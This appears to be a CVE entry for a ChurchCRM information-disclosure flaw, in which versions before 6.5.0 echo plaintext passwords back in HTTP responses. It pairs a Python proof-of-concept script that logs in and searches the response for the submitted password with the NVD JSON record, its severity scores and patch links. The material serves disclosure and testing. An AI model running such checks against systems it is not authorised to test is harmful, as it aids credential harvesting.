CVE-2025-67874

# CVE-2025-67874 PoC - ChurchCRM Password Echo Information Disclosure # This PoC demonstrates the password echo vulnerability in ChurchCRM < 6.5.0 import requests import re from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) TARGET_URL = "https://target-churchcrm.com" USERNAME = "[email protected]" PASSWORD = "user_password" def exploit_password_echo(): """ Exploit the password echo vulnerability in ChurchCRM The application echoes back plaintext passwords in HTTP responses """ session = requests.Session() # Step 1: Attempt login to trigger password echo login_url = f"{TARGET_URL}/session/login" login_data = { "Username": USERNAME, "Password": PASSWORD } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } print(f"[*] Attempting login with user: {USERNAME}") response = session.post(login_url, data=login_data, headers=headers, verify=False, allow_redirects=False) # Step 2: Search for plaintext password in response # The vulnerability echoes password in hidden fields or response body password_patterns = [ r'value=["\']{}["\']'.format(re.escape(PASSWORD)), r'password["\s]*[:=]["\s]*["\']{}["\']'.format(re.escape(PASSWORD)), r'<input[^>]*value=["\']{}["\'][^>]*type=["\']password["\']'.format(re.escape(PASSWORD)), r'"password"\s*:\s*"{}"'.format(re.escape(PASSWORD)) ] for pattern in password_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: print(f"[!] VULNERABLE: Plaintext password found in response!") print(f"[+] Password echoed: {PASSWORD}") print(f"[+] Response status: {response.status_code}") return True print("[*] No plaintext password echo detected (possibly patched)") return False def check_version(): """Check ChurchCRM version""" version_url = f"{TARGET_URL}/api/system/ping" try: response = requests.get(version_url, verify=False, timeout=10) if response.status_code == 200: data = response.json() version = data.get('version', 'unknown') print(f"[*] ChurchCRM Version: {version}") return version except Exception as e: print(f"[*] Could not determine version: {e}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-67874 - ChurchCRM Password Echo PoC") print("=" * 60) version = check_version() exploit_password_echo() print("\n[*] Mitigation: Upgrade to ChurchCRM 6.5.0 or later")

{"cve": {"id": "CVE-2025-67874", "sourceIdentifier": "[email protected]", "published": "2025-12-16T01:15:53.243", "lastModified": "2025-12-17T14:14:08.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to version 6.5.0, the application echoes back plaintext passwords submitted by users in subsequent HTTP responses. This information disclosure significantly increases the risk of credential compromise and may amplify the impact of other vulnerabilities (e.g., XSS, IDOR, session fixation), enabling attackers to harvest other users’ passwords. Version 6.5.0 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.0", "matchCriteriaId": "5A5441D8-981B-4308-AEF6-C0164766EA04"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/commit/2d6cf7aed9af1b9b47e125d1a2266f8e2a88f3fd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-p98h-5xcj-5c6x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}